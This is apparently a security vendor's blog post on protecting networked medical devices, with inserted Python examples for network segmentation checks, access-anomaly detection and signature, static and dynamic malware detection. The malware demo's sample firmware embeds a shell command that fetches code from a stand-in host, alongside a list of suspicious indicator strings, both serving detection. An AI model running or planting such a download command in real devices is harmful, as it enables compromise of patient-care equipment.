Medical devices and the IoT (Internet of Things) connected to them, together known as the IoMT (Internet of Medical Things), have created advancements in patient care. They support many people every day living with chronic diseases, and the industry continues to innovate and grow. While there is much to praise about applying this technology in the medical realm, there are also risks. With any connected device, security must be part of the conversation.
IoT enables the collection, processing, and sharing of data, and those capabilities make it ideal for healthcare. From wearables to guided imagery to implantables, medical devices and IoT are changing how medical staff monitor and assess patients. It’s making healthcare more accessible, and the recent events of the pandemic made this technology a necessity.
As more things become part of networks and data volumes rise, the opportunity for breaches or other cyber incidents becomes greater. For any stakeholders in the medical device and IoT conversation, there are some key things you need to know about security.
In this post, we’ll review the current landscape, risks, and best practices regarding medical device and IoT security.
The Medical Device and IoT Landscape
Healthcare systems have been in a state of evolution for years, even before the pandemic. Technology investments flowed through the organizations to create efficiencies, manage data, and upgrade legacy systems. Technology became a natural part of the healthcare ecosystem.
This shift in mindset around technology applications led to increased usage and development of medical devices connected to a network. Some of these were within the healthcare facility, and others were permanently implanted or worn by a patient.
Medical devices and IoT alleviated some of the challenges related to patient care, including the lack of staff and the need to capture data. This accelerated in 2020 when hospitals were stretched to the brink.
IoT becoming part of the medical device realm was a way to connect the physical world with the virtual world, leveraging edge sensors, which generate data that are easy to access and analyze. As a result, it became a viable way to monitor patients, locally or remotely. The data also has more uses, including the ability to use it in research relating to certain diseases.
Next, we’ll expand on applications.
Medical Device and IoT Applications
The healthcare sector has multiple ways to use medical devices and IoT. Here are the most common examples.
The most prevalent use of the technology is health monitoring. It works by using smart sensors that measure and monitor various parameters of a patient, either while they are in a facility or remotely.
Capitalizing on the remote aspect has been beneficial to healthcare systems. Non-critical patients don’t need to take up beds in hospitals. Additionally, it provides those that live in medical deserts, areas where healthcare facilities are minimal, better access to care. Monitoring of senior patients is another variation and much needed, considering the aging population.
In any of these settings, medical devices and IoT have many purposes, including:
- Tracking rehabilitation after injury
- Managing chronic diseases, such as diabetes, heart disease, or Parkinson’s disease
- Monitoring vitals post-surgery
The projection for this part of the industry is significant, with an estimate that there will be 70.6 million users of remote patient monitoring technology in the U.S. by 2025. This massive scale will create a host of security challenges. One of the most concerning will be the growing number of endpoints: the patient could be connecting over Wi-Fi at home or in public. The threat landscape expands, which multiplies the risk.
Medical devices connected to the internet and using IoT are another category. This includes things like pacemakers, drug infusion pumps, and cochlear implants or hearing aids. They, too, are collecting data that physicians monitor. It keeps them informed of how the patient is doing and if the device is working properly. There’s a data security element but also the concern of hacking.
The cybersecurity strategy for these medical devices is often more robust than that for monitoring devices. Both are equally important, since a compromise of either could cause patient harm. While no hacking of a medical device has yet caused harm to a patient, like everything in cybersecurity, it's a matter of when, not if.
Let’s get further into the risk conversation next.
Medical Devices and IoT: The Cybersecurity Risks
So, when considering medical devices, IoT, and risk, there are many components. Hospitals are already attractive targets for cybercriminals. According to a recent cyber threat report, healthcare saw an increase in attacks by 755% in 2021. There have been headlines regularly about hospitals and ransomware attacks, leading to system outages and lost patient data. Those can cripple operations and put patients at risk.
Many healthcare organizations have robust systems to combat these attacks, but the volume alone makes it hard to dodge them all. Others are still maturing and modernizing. Now, the medical device and IoT segment is forcing the healthcare industry to create a new round of protocols, systems, and defenses.
The FDA has a role in this in terms of guidance around security for medical devices, but the healthcare system providing and monitoring them is the ultimate determiner of security policies.
The specific new risks that medical devices and IoT pose include:
- Securing IoT traffic from many devices and sensors, which is hard to manage and often overwhelming.
- Most of the data collected is PHI (personal health information) and, therefore, subject to HIPAA guidelines.
- Remote IoT tampering to change settings or configurations.
- Unpatched and outdated software on the device, which creates vulnerabilities.
- Attacks that use the medical device as a gateway to enter the hospital system.
- Unauthorized access to a multi-tenant cloud, which most IoT devices use for data storage.
- Legacy systems connected to the medical device and IoT network, which may use outdated protocols.
The list of risks is long, and there's no way to eliminate all of them. However, you can follow a series of best practices to mitigate them. A methodology of continuous improvement will be valuable as well.
Medical Devices and IoT: Security Best Practices
How do you build the most secure ecosystem for medical devices and IoT? Adhering to these best practices will help.
Improve Network Security with Segmentation
With network segmentation, you can silo components by the flow of traffic. If medical devices and IoT live in their own sub-network, a compromised device does not provide a path into the entire system. Conversely, if hackers enter the hospital's main network, they won't be able to reach or control these devices.
This segmented IoT network becomes a hub where you can manage, control, and modify devices as needed, isolated from other parts of the network.
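The following is an added example, not code from the original post: it models the segmentation described above as a default-deny policy between zones (an IoMT VLAN, a clinical network, and a telemetry collector) and evaluates constructed flow records against it. The zone names, address ranges, ports, and the flow-log format are all assumptions for illustration.

```python
"""Check east-west traffic against a zone-based segmentation policy.

Added example, not from the original post. Zone names, CIDRs, ports and
the flow-log format are assumptions chosen for illustration only.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Assumed address plan: one subnet per zone.
ZONES = {
    "iomt": ipaddress.ip_network("10.30.0.0/24"),       # infusion pumps, monitors
    "clinical": ipaddress.ip_network("10.20.0.0/24"),   # EHR, workstations
    "collector": ipaddress.ip_network("10.40.0.0/28"),  # telemetry ingest
}

# Default deny: only these (src_zone, dst_zone, dst_port) flows are permitted.
ALLOWED_FLOWS = {
    ("iomt", "collector", 8883),     # devices publish MQTT over TLS to the collector
    ("collector", "clinical", 443),  # collector forwards to clinical applications
}


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dst_port: int


def zone_of(ip: str) -> Optional[str]:
    """Map an address to its zone, or None if it belongs to no known zone."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return None


def is_allowed(flow: Flow) -> bool:
    """Default-deny between zones; traffic inside one zone is out of scope here."""
    src_zone, dst_zone = zone_of(flow.src), zone_of(flow.dst)
    if src_zone is None or dst_zone is None:
        return False  # unknown address: deny
    if src_zone == dst_zone:
        return True
    return (src_zone, dst_zone, flow.dst_port) in ALLOWED_FLOWS


def parse_flow(line: str) -> Flow:
    # Constructed flow-log format: "<src_ip> <dst_ip> <dst_port>"
    src, dst, port = line.split()
    return Flow(src, dst, int(port))


def find_violations(lines: List[str]) -> List[Flow]:
    """Return every flow the policy would block."""
    return [f for f in map(parse_flow, lines) if not is_allowed(f)]


# Constructed sample flows (not real traffic).
SAMPLE_FLOWS = [
    "10.30.0.15 10.40.0.2 8883",   # pump -> collector: permitted
    "10.40.0.2 10.20.0.50 443",    # collector -> clinical app: permitted
    "10.30.0.15 10.20.0.50 445",   # pump -> clinical SMB: blocked
    "10.20.0.50 10.30.0.15 22",    # workstation -> pump SSH: blocked
    "10.30.0.15 10.30.0.16 5000",  # pump -> pump, same zone: not in scope
]

if __name__ == "__main__":
    for v in find_violations(SAMPLE_FLOWS):
        print(f"BLOCKED {v.src} -> {v.dst}:{v.dst_port} "
              f"({zone_of(v.src)} -> {zone_of(v.dst)})")
```

Running it over the sample flows reports the two cross-zone attempts (the pump reaching a clinical file share, and a workstation reaching a pump) while the two permitted telemetry paths pass. The same allow-list is what you would express as firewall or VLAN ACL rules on the real network; evaluating flow logs against it is a useful check that the segmentation actually holds.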
Encrypt All Data
No matter how you generate, move, collect, or aggregate data, encryption should be part of the process, covering data both at rest and in transit. Additionally, the encryption techniques used should ensure the data cannot be decoded even if hackers intercept it.
Leverage AI-Driven Protection Systems
Traditional cybersecurity tools focus on detecting and preventing known threats. You'll want to expand this further by employing AI-driven protection systems. They can provide more context and insight on who is attempting to access a system, from where, when, and how. Such activity may be atypical and unfamiliar, but AI-driven systems can detect it in real time.
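To make the "who, from where, when, and how" context concrete, here is an added example that is not part of the original post. It builds a per-account baseline from constructed access-log lines for a device-management API and then flags new events that deviate from it. This is a simple frequency baseline standing in for the learned models of an AI-driven system; the log format, account names, and addresses are assumptions.

```python
"""Flag atypical access attempts to a device-management API.

Added example, not from the original post. A per-account baseline of
source networks, hours of day and HTTP methods is learned from a
training window and used to score new events. This is a simple
frequency model standing in for a trained ML model; the log format,
accounts and addresses are constructed assumptions.
"""
import ipaddress
from collections import defaultdict
from datetime import datetime

# Constructed log format: "<ISO timestamp> <account> <src_ip> <method> <path> <status>"
TRAINING = [
    "2024-03-04T08:15:00 nurse.ahmed 10.20.0.51 GET /devices/pump-17 200",
    "2024-03-04T09:02:00 nurse.ahmed 10.20.0.51 GET /devices/pump-17 200",
    "2024-03-05T14:30:00 nurse.ahmed 10.20.0.52 GET /devices/pump-22 200",
    "2024-03-04T10:00:00 biomed.svc 10.40.0.3 POST /devices/pump-17/config 200",
    "2024-03-05T11:10:00 biomed.svc 10.40.0.3 POST /devices/pump-22/config 200",
]


def parse(line):
    ts, account, ip, method, path, status = line.split()
    return {"ts": datetime.fromisoformat(ts), "account": account,
            "ip": ip, "method": method, "path": path, "status": int(status)}


def source_net(ip):
    """Generalise a source address to its /24 so nearby addresses count as familiar."""
    return str(ipaddress.ip_network(ip + "/24", strict=False))


def build_baseline(lines):
    """Per account: the source networks, hours of day and methods seen in training."""
    base = defaultdict(lambda: {"nets": set(), "hours": set(), "methods": set()})
    for e in map(parse, lines):
        b = base[e["account"]]
        b["nets"].add(source_net(e["ip"]))
        b["hours"].add(e["ts"].hour)
        b["methods"].add(e["method"])
    return base


def score(event, baseline):
    """Return the reasons an event deviates from its account's baseline (empty if none)."""
    b = baseline.get(event["account"])
    if b is None:
        return ["unknown account"]
    reasons = []
    net = source_net(event["ip"])
    if net not in b["nets"]:
        reasons.append(f"new source network {net}")          # from where
    if event["ts"].hour not in b["hours"]:
        reasons.append(f"unusual hour {event['ts'].hour:02d}")  # when
    if event["method"] not in b["methods"]:
        reasons.append(f"new method {event['method']}")       # how
    return reasons


def detect(lines, baseline):
    """Return (line, reasons) for every line that deviates in at least one way."""
    alerts = []
    for line in lines:
        reasons = score(parse(line), baseline)
        if reasons:
            alerts.append((line, reasons))
    return alerts


# Constructed new events to score against the baseline.
NEW_EVENTS = [
    "2024-03-06T09:20:00 nurse.ahmed 10.20.0.51 GET /devices/pump-17 200",          # normal
    "2024-03-06T03:05:00 nurse.ahmed 203.0.113.9 POST /devices/pump-17/config 200",  # three deviations
    "2024-03-06T10:30:00 unknown.user 10.20.0.51 GET /devices 401",                  # unknown account
]

if __name__ == "__main__":
    baseline = build_baseline(TRAINING)
    for line, reasons in detect(NEW_EVENTS, baseline):
        print(f"ALERT {line}\n    " + "; ".join(reasons))
```

The second event is the interesting one: a clinical account that normally reads device pages during the day from the clinical subnet suddenly changes a pump configuration at 03:05 from an outside network. Each dimension alone might be benign; the combination is what a context-aware system surfaces for an analyst.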
Conduct Regular Pen Tests
Pen tests find vulnerabilities, and any healthcare organization should perform them at least annually. You'll want to find a pen test provider that specializes in healthcare and medical device cybersecurity. Through this activity, you'll learn where your weaknesses are and be able to remediate them.
Automate Software Updates
The software running the medical device must stay up to date. If patches don’t install promptly, it’s another thing for cybercriminals to exploit. No matter the type of device or where it physically is, your medical device cybersecurity protocols should include the automation of updates. After an update, check the systems to ensure successful completion.
Defend Medical Devices and IoT from Malware
There are three methods to protect against malware in IoT. The first is signature-based detection, which only applies to devices with small memory and works by matching antivirus signatures. The second is static analysis, which uses the device's static characteristics and lets you search for malware without changing the code. The third is dynamic analysis, which tracks network behavior for signs of threats.
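The three approaches side by side, as an added example that is not from the original post: signature-based matching on a digest of a firmware image, static inspection of the image's characteristics (its embedded strings) without executing or altering it, and dynamic inspection of the device's observed network behavior. The firmware bytes, the known-bad digest list, the indicator strings, and the connection records are all constructed placeholders, not real samples or indicators.

```python
"""Signature-based, static and dynamic IoT malware detection, side by side.

Added example, not from the original post. Every input here (firmware
bytes, known-bad digests, indicator strings, connection records) is a
constructed placeholder, not a real sample or indicator.
"""
import hashlib
import re
from collections import Counter


# --- 1. signature-based: exact match on a digest of the image ---------------
def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def signature_match(image: bytes, known_bad: set) -> bool:
    """True if the image's digest is on the known-bad list."""
    return sha256_hex(image) in known_bad


# --- 2. static: inspect characteristics of the image without executing it ---
SUSPICIOUS_STRINGS = [rb"/bin/sh", rb"telnetd", rb"wget ", rb"busybox"]  # assumed indicators


def static_findings(image: bytes, min_len: int = 4):
    """Extract printable strings from the image and report those matching an indicator."""
    strings = re.findall(rb"[ -~]{%d,}" % min_len, image)
    hits = []
    for s in strings:
        if any(pat in s for pat in SUSPICIOUS_STRINGS):
            hits.append(s.decode())
    return hits


# --- 3. dynamic: judge the device by what it does on the network ------------
def dynamic_findings(connections, allowed_hosts, max_hosts=3):
    """connections: list of (dst_host, dst_port) observed from the device.
    Flags destinations outside the allow-list and fan-out beyond what a
    telemetry device should need."""
    findings = []
    dests = Counter(dst for dst, _ in connections)
    for dst, n in dests.items():
        if dst not in allowed_hosts:
            findings.append(f"unexpected destination {dst} ({n} connections)")
    if len(dests) > max_hosts:
        findings.append(f"fan-out to {len(dests)} hosts exceeds {max_hosts}")
    return findings


# Constructed sample data.
FIRMWARE = (b"\x7fELF" + b"\x00" * 16 + b"sensor-fw v2.3\x00"
            + b"/bin/sh -c wget http://example.invalid/x\x00" + b"\x01\x02" * 8)
KNOWN_BAD = {sha256_hex(b"placeholder-bad-image")}  # constructed digest, not a real one
CONNECTIONS = [("collector.hospital.example", 8883)] * 5 + [
    ("203.0.113.7", 6667), ("198.51.100.9", 23), ("192.0.2.4", 23)]
ALLOWED_HOSTS = {"collector.hospital.example"}


def analyze():
    """Run all three methods over the constructed sample and return their results."""
    return {
        "signature": signature_match(FIRMWARE, KNOWN_BAD),
        "static": static_findings(FIRMWARE),
        "dynamic": dynamic_findings(CONNECTIONS, ALLOWED_HOSTS),
    }


if __name__ == "__main__":
    for method, result in analyze().items():
        print(f"{method}: {result}")
```

Note how the methods complement each other on this sample: the digest is not on the known-bad list, so signature matching alone says nothing, while the static string scan and the dynamic view of the device's connections both raise findings. That is why the post lists all three rather than relying on signatures alone.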
Use All Other Cybersecurity Best Practices
The final piece of advice is to ensure that all other cybersecurity best practices are part of how you're protecting medical devices and IoT. Those include firewalls, intrusion prevention systems, advanced log monitoring, antivirus and antimalware, and authentication.
By combining the specific protocols for safe medical devices and those central to cybersecurity, you give your network the best chance to stay secure. The usage of the systems in healthcare will only grow, and so will the risks. Having a partner that can help you navigate this need today and tomorrow will provide great value.
At Blue Goat Cyber, we have significant healthcare expertise and medical device cybersecurity assessment and testing expertise. We can help you identify, mitigate, remediate, and monitor risk. Contact us today to learn more.